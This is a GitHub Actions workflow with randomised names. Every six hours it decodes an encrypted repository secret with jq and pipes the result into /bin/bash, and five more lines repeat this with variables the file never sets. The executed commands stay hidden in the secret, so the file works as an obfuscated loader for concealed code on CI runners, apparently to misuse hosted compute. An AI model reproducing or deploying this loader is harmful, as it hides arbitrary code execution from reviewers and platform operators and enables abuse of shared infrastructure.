name: liusichang3819
on:
  workflow_dispatch:
  schedule:
    - cron: '20 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liusichang3819
        env:
          ur71: ${{ secrets.ur71 }}
        run: |
          echo $ur71 | jq -r .miafb22 | /bin/bash
          echo $do739 | jq -r .yv9954 | /bin/bash
          echo $aqcq58246 | jq -r .pgag1 | /bin/bash
          echo $crlt945 | jq -r .u0 | /bin/bash
          echo $m91 | jq -r .tv6 | /bin/bash
          echo $fdl90 | jq -r .pzea79394 | /bin/bash

